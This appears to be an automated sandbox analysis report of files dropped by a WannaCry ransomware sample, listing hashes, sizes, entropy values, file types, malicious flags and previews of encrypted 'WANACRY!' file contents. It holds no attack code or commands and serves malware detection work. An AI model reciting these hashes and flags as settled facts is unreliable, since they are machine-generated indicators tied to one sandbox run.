                                                  SSDEEP:24:CkGYSOZfdKYd5M40tmXWd47okFHtr+Mq9sptQkyxV/iNtDOj:CkpfdTdF+nd4zN6MP49xV/iHQ
                                                  MD5:A9DA251708953A180E9E4DDE39145D4A
                                                  SHA1:9E6FE1EFF1451F933870192A8EDAC1C454EF78F7
                                                  SHA-256:B297197BB6754BA8693403EF87D6B5435651C4F777E3DF90914D439A77899AB8
                                                  SHA-512:602C9D316CFCFBBCABD144EDF708EB9E4A40E70A46A5200EA58D4FC8D7B23C00481125841A35EEEE6A0ED98C4B4D62471D36494D6F650EC37587CC7D8EDEC643
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.838727452890481
                                                  Encrypted:false
                                                  SSDEEP:24:bk50dq7XLCL6s+CjpZn2Ax0uD13Ja925r41Kgzr98Bi3XsPyaL:bk504naSCj32AxvDy9qrkB8E3G
                                                  MD5:09055AC23F4EDB272CE925E24B19DC61
                                                  SHA1:BCA17A61BEB9E43294A86A8508D08FA4D62856EB
                                                  SHA-256:A7AC40BD8A9B50AB4986C040B6131D01A9179F534BD7EE9B4E245FC7F646E0FC
                                                  SHA-512:F282564D1010D63A45AD56143E0440380BF0120EF51543F29C93D353EB9A5BC3490F58306D9AE618B274F6334A0CA0F7DC0D5D6C8DBB192D4354C3C98188EAE7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.790706969654274
                                                  Encrypted:false
                                                  SSDEEP:24:8IQ+g3MVvnyYSJ4ue6hWal/qvjCiXUaWtm6M:8IhgU9q4shWal/qOiXDWe
                                                  MD5:05D85E25B74BCBB3748225A443C3D55E
                                                  SHA1:D886332244B5648091FB4794B6A64B4369AD0233
                                                  SHA-256:32E776C4FFBF771AE43341EEB33F6B05FFCD4DB6CD020391BDE8FD3CE02C22CB
                                                  SHA-512:59E5D35BB13473D64EB3201FD1A5AEE68CA4D77A2D0DB61B3AFB4A8B053B0109FC81293EFC310021F87B8DC0EAACDA3665900B9635353051D82B07324B7B2100
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842247652316845
                                                  Encrypted:false
                                                  SSDEEP:24:bkoncynqW7/x/eS0yf0/MeYTpltHsvs23EgZ4uOZ+L5cjW/k1s:bko3qW7/ZeS0MptMvs2004nU6V1s
                                                  MD5:668216BED35257E537D8B452D28D51FD
                                                  SHA1:E025617503280F721E06B610C72A183B1821209D
                                                  SHA-256:0DCB97067C31AF880D4E6B9122099291CC5391CB25EC353F7D17B21BD367CB4A
                                                  SHA-512:54F4B72F5CD35BB2A2A32355423628EABB51AA3F57AAA4016CADB7EC5A312520B17C7F4CA2A1ADC7EE4D17AB9944B5222C06D80D2F776F105ECAE44797D8C5E5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.791617140072544
                                                  Encrypted:false
                                                  SSDEEP:24:vxJB1vIbc/R325nwrqo/IDVmrgA9CIJbNMAiqvV:Z1vIoZwnwu1V4xEA39
                                                  MD5:25FCAB95331909AAC0507AD8B7EF4A23
                                                  SHA1:CA8FB9291B38254F5F0AA3D601717A90C592C728
                                                  SHA-256:33F1E8CD27F852D452D7A19CECCC670FB91947044C0DFBA85821B892F96BC0E0
                                                  SHA-512:B995E3A26B5D3FE762C7ABA12205406B884A33D1965C1F79E18CD8FDD3C53BE46C30E1A385C40F60C231A2585D1AEAADEE32E3CF56EDCFB03D47B612DE8363C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861080497585509
                                                  Encrypted:false
                                                  SSDEEP:24:bkTopTJbjCzQb0zZpLZqztvS1Ir0tqPFks9mo8/CbFXVQtC1PjmeV94fYWu1FTGW:bkTo/bjCzuuLy5S1nteksYCvQtC1meL/
                                                  MD5:A9A833F265E2B0B2FE33232C29FC9D7D
                                                  SHA1:C0E3DFF457761007331C7E38A6DA17097F0F6BAA
                                                  SHA-256:8D60084DC9521AC3A7AEB5433A5D2CA4B2833DA62C66CCE2BE9C37E5C736E0E1
                                                  SHA-512:FA926813AA65986F77B6787E7D38427E98EAD61DB6F41CD1C2D0637DF562812CB7575D7ED9FB1199B40954620225D2E86B55BAEE01777A7CD054CAACB82C4E06
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....[.m.{...MX..t....J.7..^..R..e...3..r!...tbA..f....#....J..g#.8O#.Z.......h.j.....4.A.{N..mTxe'...U(.6.l.. .=}n...O..cmw._0x....'g..FYD.8+L$.zapc6OR...Mo}...8.Z....F5..a......!..G.Wr..\n...7.B....Z.....#.....<].M<.M"A........,...biA..N.F..e...sHDM.............../.......in.R.q.OZfT.....Z.0........C.wz.\.....`....s.t.Ov.14...@.(..<....b]jK....jC..o3O..0....S...p.)..............E).'^........Q.VZ.b...;Ap8..b..%b..~E;...C.p.S<.1o@.J.8u.Z...y...!2.y....IXG8X0N.Q[..5q.e...J....bg5....B#n.%.wq5.(.(.D+n..Q\.2$..?..?>.,....%Qs`.1 .c4..D{......T.7qZ....;.\.Sc.._.8...4...:..~....Q.Z[.......f.T%..y.......NY...0.....2...../K..b..I..~uV\.DB(._...DIe..;MY$.{$.R..T..$.h....Z...%.I...Z.{uuv............>Qo...cM..hlC...._.y..... p...>\~.q.....s.............Z].....~v%.t......"...8=)l..*d,E...?3#.w@......I.X..`j.h{.i.~_.T.&a.,3OY....@:.....$..D..5.Q......9.^.....mc.....Q..>w%..x4`1P._.......T1...p..}.H..t..mL.da....p.D..2KE........'.}.....eq.Y..,..uQ.L
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861080497585509
                                                  Encrypted:false
                                                  SSDEEP:24:bkTopTJbjCzQb0zZpLZqztvS1Ir0tqPFks9mo8/CbFXVQtC1PjmeV94fYWu1FTGW:bkTo/bjCzuuLy5S1nteksYCvQtC1meL/
                                                  MD5:A9A833F265E2B0B2FE33232C29FC9D7D
                                                  SHA1:C0E3DFF457761007331C7E38A6DA17097F0F6BAA
                                                  SHA-256:8D60084DC9521AC3A7AEB5433A5D2CA4B2833DA62C66CCE2BE9C37E5C736E0E1
                                                  SHA-512:FA926813AA65986F77B6787E7D38427E98EAD61DB6F41CD1C2D0637DF562812CB7575D7ED9FB1199B40954620225D2E86B55BAEE01777A7CD054CAACB82C4E06
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.809266884387007
                                                  Encrypted:false
                                                  SSDEEP:24:D254GyPGfFrnlPGcE7jFmqZHzuloF/NpnMcjxw:D2mjWtnu3gmPNNbxw
                                                  MD5:6111258FE7D58E1118BBCD7EF4A6BBD1
                                                  SHA1:9BE6732C0B7E9B9C5B872ECCC1EC43D371A213C7
                                                  SHA-256:128D29DD818B3A553569E2661510024ACB4463A3D46A769A730E3FB682759757
                                                  SHA-512:D0E2B04BDEF026D7501CD5E2B4EA501F6050794C892E7B511CC1799528308BF6D696907EFBB38FDEC7C7E09168F3C80CC66173BD58206117B3F79E1661DF03FE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8538507254183045
                                                  Encrypted:false
                                                  SSDEEP:24:bkr6x6esVDwhQG4bTKYo9Bfl24idjh6q/RFcpjWN17QcdifIY3H1B33DQG9yPf81:bkGgesVQQ5KJhU8qpFcFWGfHLEGkfiX
                                                  MD5:0E12742638D23D1D47BE7625F19ABDDD
                                                  SHA1:AF4F906BDADF1B9488E689BB03743E1AA8D041A8
                                                  SHA-256:7702A57E9278FB722C9277DB81C6CFAC7165B39023C53295DE910143BF57A6DF
                                                  SHA-512:59E13B093455454A7398073BBAD1DF6C600F38007CD48819152B57E5735F677C535652A3491A0777152763C262EFAE88781F86D7BD8BF1EA2D8B3E1DE75C3865
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.814816740887121
                                                  Encrypted:false
                                                  SSDEEP:24:OUeXO7RHFsTSXseWrT2OsKssDGfzdnjfPWTZn:OUh7RHFsWe2msQaz5rPWTZn
                                                  MD5:0A246085D7210CC2C2137F8ECABEBB50
                                                  SHA1:5E987FD903088BAB187A9217565B872A34BF60F9
                                                  SHA-256:5EDF801987F8121CED9D0DD690CA053498A6F323A6154324DA8AD3A81B0CDD43
                                                  SHA-512:5659CE74136FAEBD16438658A422947589079D3DF8ABB87491BCB3E8A1A7C277BC98C112B0761616135AC9B0B07DDA9CDB5A10469C5B8B171F080F9A3176516D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861168371006819
                                                  Encrypted:false
                                                  SSDEEP:24:bkQVI4Y5wxrXQx3JVy3aUyUt8ifZ5tPeoWDWKq6lrgkakRXu:bkuY5wxrgXV+awlV9wlrgk5RXu
                                                  MD5:3B6298D5E968C0E7CC69E5AE7B95B66D
                                                  SHA1:26EBFEFED131B2AD3C8015C141D5084D995937F1
                                                  SHA-256:FBB7D1E1ED19064EBA385F45AA2288B04A02C8D6A2575116E730A770F5FBE499
                                                  SHA-512:E556333E5635478FC562128663964CED667244ED54B1B68F4CEAF8F963643759B383F94FC57ED355F34B0AD0E26C28DAA1D8E72AEE682DDF2A4D8087C11B3816
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.817309017875281
                                                  Encrypted:false
                                                  SSDEEP:12:unTDxuxcVLjoc/zyMdas8sxKO8SqihCkaV2HMArn4Ghz0SBBJQrpsYFIb2QDSbwp:unTD+cVY8vFlZ+/mrfbJcps/rDSwCW8G
                                                  MD5:AAFF507717F37754B32D6375B30F457C
                                                  SHA1:FAAA50084BEBAA7F0E0A6C85A51A931752A0ED43
                                                  SHA-256:2C0B83179CB7CC7E6785A106AE6B7758085515A82FF8A058CBA16E94174D50EF
                                                  SHA-512:220AA91CC0E8C293081DC7A944991C66718861A81E07A0EE37BA82AE8DB2EF02F4B872805A47D3B90EBE3DC93B8828B4F54EB3103D653DACA76CBA21721F4947
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8534886434631215
                                                  Encrypted:false
                                                  SSDEEP:24:bkrDR2LUiqPWeFa2HIBQSEtvD5OaAIBzm1k8cEco8YnGSS/J//Nuy4CJO:bkrDEUiqPWma2HIB1O75OcB67S1Uya
                                                  MD5:040359A767D8DC7004235B5EC785CAFE
                                                  SHA1:B5CAD890623BC25394152E4D0DA618BC0B49A9CC
                                                  SHA-256:2FC99E4B8BB11256F257F6A9F040A484AA7D2EAAE4DB06758E963C8E9DDC618E
                                                  SHA-512:B8130BC4B4CD57F72430002DF67D814633EE9053D1809C3B92C510859B18D7C455AA2E4C2E8CB985A1F18BC6D2516E76C4276F3140FB2A41D74D9C7AB0FF8782
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.823078078306793
                                                  Encrypted:false
                                                  SSDEEP:24:KSBvVVsR+5TDFTKu8OFRvZck5jVBeP9v7/X7iJrI2C6:KStsRQFWupFL5ytbr2rIw
                                                  MD5:13E240ED48EE8EADC3DF0E9C0C7CA782
                                                  SHA1:9EDC2D6DC811CF20AD4D15E8091641B5B8887239
                                                  SHA-256:545B5F1D22F127D3750CC7E029FFD3C7399621CF541D111644794F855FF5A208
                                                  SHA-512:C9A74CB28F81061E3BC79067CA5147C21CE9D88800C0470126C0A3E5F1794A2F65EDBE5ECA0CF1299DF9A8D393961E9BDF1F534A469070C2B9EF5B2CD0EEAB0E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826895294508878
                                                  Encrypted:false
                                                  SSDEEP:24:bkDYlF+TWQfMzu8QPH5fKw4Yn0rjntvhSzMQqd34SrlS:bk0ufUzu5iwn0rrVcAQ034t
                                                  MD5:0823027AB2F9CD0EE78ED709F9C2490E
                                                  SHA1:CED6060626548EA43A9B8BFC6D9E06983BCF1F4C
                                                  SHA-256:03C9C168992D5023FEF6F94E132E89BC90A2D0F77C0E18D0FABAC05356A64F53
                                                  SHA-512:257A1A7CCBBCFC2E83317ECD5C4C9097E961C2EF73345DE7A62D61BA57FC179EDFD99B7F9F18DE3766B4FEB80BE81100FCA5E5C74E9B8E58F8D8B83F2DFB3173
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:COM executable for DOS
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.809328826148128
                                                  Encrypted:false
                                                  SSDEEP:24:TTShNuVorf5jiZR7OP5AjhpYCx/Mss+cjlScLsmW0dZ2U/:TTS/v5c0P5x8/Mf+2FLsmn2U/
                                                  MD5:AC8D1D7E4D7E86AA41125D0573287FE7
                                                  SHA1:06DADB2A070A95FDB5B62233AED37484D5BA2276
                                                  SHA-256:35C072DC1DBEC4FD627D5DCF4676826E81D9A4C0761A8CBBC7A71CDAA09DD175
                                                  SHA-512:4C2A8C4E63518F5F3E6F35C6B7BA0DF2182027B2019E617367C72FF6787EE5580B6558D492143E65B3740286994D4E6BB2FB6D34F979A52B2D83A893A4898869
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.868364372884899
                                                  Encrypted:false
                                                  SSDEEP:24:bkF2MgQhnFejRmAvznlxrFB759z1pqWaq/Nc84AEpgXUR97a+1X:bkF2MDhsjRmAvrTZz9zTqv844URTX
                                                  MD5:F0B4252CE437F768DF76F64325DFA8AA
                                                  SHA1:4C08C8F9F22192766ABB3DF4FFDA82AA70FB3215
                                                  SHA-256:7A8A387F7EB547C517F6B2C5732015C4EB3057CA84575985901C6D230AB26E71
                                                  SHA-512:3303FC5B48385A04B9B801A1FA2CC7998C567B1418EEC83F0899DE016359994147B5812338FEB21D7171F8C858BF7663983D27029248B0A48B69E47189C71675
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....K..l..&..c=......G...W.).* ....!......q....kL..<..a.........!2./...#A....n..|6...Z9kph`...&..}x.....sQ.>.G......m..2G.".o.....H. ...=..5..kX5Qn. )!.....2.k.&. .@..8..1.%..J...|.0.1+..-.,.[P~...X...Y.g<;hUd..?U..l..R...A.A...at..i#.0z."..N................:pj.......t...<.i...........&2R......J........Jy..9<..C$.`.;.9...b...P....s....y{;.v..(.y..E.N.=...R.._.P6.X.......3........>b.M.y.......|.@!..4..#....R...M.o..k-. b..'... v..R)A*=a#vP.,.8.t:....O..-...V...*.-..o...%.yXb.......!..4...M...S......\............'C..f.c)"......V.cY%z.5.".....HRO.6.. .7....>.....,M'......;&....Q.p&~.4h.d.0Kdol....J..b#...........U....d!..F.~...SVvtN.aE.*].S.......5iI...E..E....%..H.C.....c.E.6.&"t.....}G..9H....Q.....i..?-..L9....W.7X.......j.T...a...Q3O.'i.I.F.......P..q..~........6....%..T...\.%J...`.ME..L..F..9(jxzL...~-...H..O.J..Jy.....V...DG......!.^....).uKI.5r.....b...{...#.\E..#.$.5..>..{1l..a...>...w.U......R...m....b*..vg..@n+J\.1K.
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.868364372884899
                                                  Encrypted:false
                                                  SSDEEP:24:bkF2MgQhnFejRmAvznlxrFB759z1pqWaq/Nc84AEpgXUR97a+1X:bkF2MDhsjRmAvrTZz9zTqv844URTX
                                                  MD5:F0B4252CE437F768DF76F64325DFA8AA
                                                  SHA1:4C08C8F9F22192766ABB3DF4FFDA82AA70FB3215
                                                  SHA-256:7A8A387F7EB547C517F6B2C5732015C4EB3057CA84575985901C6D230AB26E71
                                                  SHA-512:3303FC5B48385A04B9B801A1FA2CC7998C567B1418EEC83F0899DE016359994147B5812338FEB21D7171F8C858BF7663983D27029248B0A48B69E47189C71675
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.807389885361978
                                                  Encrypted:false
                                                  SSDEEP:24:W2Dt+GAhZyIYfga/zOfaVNGttv9+xRFK+ayt8gAWR9kBS:W2Z/kDarZGttF+xCIt8gOS
                                                  MD5:C151D01D5B70797EEAF7ADB2D34451B2
                                                  SHA1:635ADC1E62F7F9E4FAE2045EFF81D4B40BB46351
                                                  SHA-256:BB5DBC787DC79E82ECA6962157CDC97779CB0B804226FB270056253877327C4E
                                                  SHA-512:0C2F5A4B0CBA4B5445BB24A1B8F9900E1B505513DAB20E3B488CFEFF7887FDF6C40706D3EA8E4E9E4D1CA62A5CB76D6DDEA0F6B244F90252FD93522D98933016
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856249263364781
                                                  Encrypted:false
                                                  SSDEEP:24:bkrNA5xn0LD9jnVss1pQuChCFT7mEl0ABZXbAmdeDmms2q3P:bkrNA5xEhnnrQfMx97rAmdFmQ3P
                                                  MD5:50C43A394C58280EEF8B2EAB3D974834
                                                  SHA1:2BF1642ED063BAF6A8FC3C76763183AB783830A8
                                                  SHA-256:8A3F9067BBAAD482A35C917793DFEB7B1990C800835F334BD9D73A2551282F76
                                                  SHA-512:B49DAE744C4E96A1B304C343ED14E30F6BEE10682D43B67C11EC11B4BD41CF15E0D128A3638A587B7DEC8BF88C1FE38220368DA83BF211DF00DEC94280C17C12
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856249263364781
                                                  Encrypted:false
                                                  SSDEEP:24:bkrNA5xn0LD9jnVss1pQuChCFT7mEl0ABZXbAmdeDmms2q3P:bkrNA5xEhnnrQfMx97rAmdFmQ3P
                                                  MD5:50C43A394C58280EEF8B2EAB3D974834
                                                  SHA1:2BF1642ED063BAF6A8FC3C76763183AB783830A8
                                                  SHA-256:8A3F9067BBAAD482A35C917793DFEB7B1990C800835F334BD9D73A2551282F76
                                                  SHA-512:B49DAE744C4E96A1B304C343ED14E30F6BEE10682D43B67C11EC11B4BD41CF15E0D128A3638A587B7DEC8BF88C1FE38220368DA83BF211DF00DEC94280C17C12
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813391721287467
                                                  Encrypted:false
                                                  SSDEEP:24:QykbM01mIOBuZhcNuJO2JKaZG9F/T2oVBP3KUrMoMil/PJDUUkSIDlOIpTs:Yf1mIfX8MhKaZ8F7JjXYoFlnJIUbol54
                                                  MD5:4745117616B137D3DA356E97F2756768
                                                  SHA1:1DBC68717E4865DAF037BC78969DACBADCE549D4
                                                  SHA-256:A6FE74920B90F342D706D081BE20A292433DA6BBE35BAE822B18CA80F987C8BE
                                                  SHA-512:AE4CC197DCA9DF9217B23A342C5927BDACA37FF1DD5F670D3375C3615252CC6C8C6B86E69E99DCBC4AE6CF8410D012AD93EA92DC11DA924B21567131FD24D701
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85506142651167
                                                  Encrypted:false
                                                  SSDEEP:24:bkJ6HcmNhg1TRYudHh3UBcLcBMY3FKS9gzfv7pf6uSh0tFurW/N6kZ2s2jLT3Tg:bk2SYu7kB6sebfDpCuSDrW/NRZQnTg
                                                  MD5:CF851D67063714AF8BAE7813CFB1FD46
                                                  SHA1:156F91AA790FB32A97C779E749EF12DCB13B4B75
                                                  SHA-256:67E6DE4032EE1F6F341244FD45C552DE723E9E8BB240B493FFEBCB47FF55DA90
                                                  SHA-512:C9D57A86B80404840E9D584FA9E4CB3C762255E3F73353AF6C787E6254304D5E3269B1CEEBE869A9AB674D5CF721B242362DB343ADD70B40B7C774DAD00189D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85506142651167
                                                  Encrypted:false
                                                  SSDEEP:24:bkJ6HcmNhg1TRYudHh3UBcLcBMY3FKS9gzfv7pf6uSh0tFurW/N6kZ2s2jLT3Tg:bk2SYu7kB6sebfDpCuSDrW/NRZQnTg
                                                  MD5:CF851D67063714AF8BAE7813CFB1FD46
                                                  SHA1:156F91AA790FB32A97C779E749EF12DCB13B4B75
                                                  SHA-256:67E6DE4032EE1F6F341244FD45C552DE723E9E8BB240B493FFEBCB47FF55DA90
                                                  SHA-512:C9D57A86B80404840E9D584FA9E4CB3C762255E3F73353AF6C787E6254304D5E3269B1CEEBE869A9AB674D5CF721B242362DB343ADD70B40B7C774DAD00189D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.808219026271454
                                                  Encrypted:false
                                                  SSDEEP:24:Lcq8odOoQ/3OWtxHZcdOzykjTG4hXT0O5vlz3hOdHd19Jj/b:LcCOH/3OyHZeOzyEK4hXT0Obz3hOdHdp
                                                  MD5:4BF44035F161D1D2F36025E33433A828
                                                  SHA1:98074E2581F90920533ACBD7C4F642E99D169D21
                                                  SHA-256:C682816FD03CFE710DA1359784CFD44ED43B91B60BDA3F42E0EF4709BA68B465
                                                  SHA-512:4AB005DA66377FDBC7118B8A4D6EF36D733F9FF141AC17E22B483CF1580B35E6474432334ECB4CC1DFE33518B0A99B0A0FC5EF397D1F0823A0BD0D4C4E79DEB8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.846634920248611
                                                  Encrypted:false
                                                  SSDEEP:24:bkF2P9x+HPsCqtntXpeKFvynMA+uyuXIesMJtuZ0zD5Y/aJSLJORmk:bkF2P9xuPqtntXpeCSB+ujTsybzlJSLA
                                                  MD5:14A31C8DE8D284CF2462F533B1214A20
                                                  SHA1:1E63901AECC75DD1D2B989671E7B0631158DF7A7
                                                  SHA-256:93CF59495E4D64F79E129A5C4A03066B0E3AEE14B2706E04C9C9E44C7845A33B
                                                  SHA-512:0B1FCD8D40595116E890B7237CB20E39F0D78AAB394770553A7683F0E0003443CD8E07EB45DC5A6967A5C572A38EB1177971A30998C2AEFD455D59CAB02D0AEC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.846634920248611
                                                  Encrypted:false
                                                  SSDEEP:24:bkF2P9x+HPsCqtntXpeKFvynMA+uyuXIesMJtuZ0zD5Y/aJSLJORmk:bkF2P9xuPqtntXpeCSB+ujTsybzlJSLA
                                                  MD5:14A31C8DE8D284CF2462F533B1214A20
                                                  SHA1:1E63901AECC75DD1D2B989671E7B0631158DF7A7
                                                  SHA-256:93CF59495E4D64F79E129A5C4A03066B0E3AEE14B2706E04C9C9E44C7845A33B
                                                  SHA-512:0B1FCD8D40595116E890B7237CB20E39F0D78AAB394770553A7683F0E0003443CD8E07EB45DC5A6967A5C572A38EB1177971A30998C2AEFD455D59CAB02D0AEC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PGP Secret Sub-key -
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.831915502669585
                                                  Encrypted:false
                                                  SSDEEP:24:JZs6DzBupkw2RIZXULGoXdxdbqLxEzeSrShmM+ClKd9tcs:ck+klaJoX7Bw+eSrjkkAs
                                                  MD5:54D49E9DA9BFF2DEBF5CC198FFCA9FBE
                                                  SHA1:4482183E0F6F98B0F29AC752938013018071A328
                                                  SHA-256:E85815B411E69AB303424D7E21F95F7E141D39150D9B85A7408BDD0C430F86AD
                                                  SHA-512:8358EA84D38CA71E7DC8CB38E6458CB9ED0C2DDE142C602F15DB118A1FF80EDE1F85569476F60283AEEAFD3E01A7C5DD0B4A001E7B1B65F49A4D191A5DE8ED73
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.852055707472461
                                                  Encrypted:false
                                                  SSDEEP:24:bkVCSi1OfH/3OKZGAqUetIu734eelrU9/VD/ns2FJPL0H/8XfXrMUITmztXnKpoN:bkVCzYfH/3Opaur4eelM1/s27z00vXr1
                                                  MD5:7229FDE467F4907DEF2E26F5DCA3E5E8
                                                  SHA1:679DAA61C240F3E100D5E3D0EFFCCF6976C1E15C
                                                  SHA-256:650FAEC7C884AF02AC663F67770575F8DC8FDF06FCDCEAFDCC8CDA6E334FEE94
                                                  SHA-512:BA6C2BFD60888F0D498EDD4E9FA0D9313F2EBE206CC0F42581DB63475F281710B3D1D450C43FAE2DC170AD2172343A97D5D54DC9C055ECEFCD4EE64486ED6D13
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.852055707472461
                                                  Encrypted:false
                                                  SSDEEP:24:bkVCSi1OfH/3OKZGAqUetIu734eelrU9/VD/ns2FJPL0H/8XfXrMUITmztXnKpoN:bkVCzYfH/3Opaur4eelM1/s27z00vXr1
                                                  MD5:7229FDE467F4907DEF2E26F5DCA3E5E8
                                                  SHA1:679DAA61C240F3E100D5E3D0EFFCCF6976C1E15C
                                                  SHA-256:650FAEC7C884AF02AC663F67770575F8DC8FDF06FCDCEAFDCC8CDA6E334FEE94
                                                  SHA-512:BA6C2BFD60888F0D498EDD4E9FA0D9313F2EBE206CC0F42581DB63475F281710B3D1D450C43FAE2DC170AD2172343A97D5D54DC9C055ECEFCD4EE64486ED6D13
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:COM executable for DOS
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.83373114041739
                                                  Encrypted:false
                                                  SSDEEP:12:DSbb8aBI+1NLvu1GoEL+hUImxvSd/WZ6p3cxlLZe51jew9RxneZdz5J5ZfWsy4YT:DwBDeuLpbUQ6nzqkheF1+sy4BMiHhSv
                                                  MD5:0B30E125E00E569F08D183A0AFBA1AC0
                                                  SHA1:0686DE7755B4158918880BF029D0493EFFD90BE2
                                                  SHA-256:7C730340DA27BCC506CA6A79F81AF8CA42DBB8F30BA66C14F06DA17AA6884D2F
                                                  SHA-512:71F8805A92A11AE654E04C7D5346AC35D3583E74B95C0349CFDA786521C9FC7A846ECEB333BE298AFB532CF29C20AA6517E365EF55356ED0DC7AECFE505F0C6D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851463239021162
                                                  Encrypted:false
                                                  SSDEEP:24:bk1RUmPRXeGdKxxF2nvIJMgr9YONDVsDBW0XS/UjkMjQhYsOdE+vcOXyo7Nt0e9y:bkQm6Gv3UjNDVUW0i/UY2iYvfvGoEQgf
                                                  MD5:29512E14761359490DFBDB9191C1CA55
                                                  SHA1:ACE259B0AFAF05C31144F283D6702ADB31FC3539
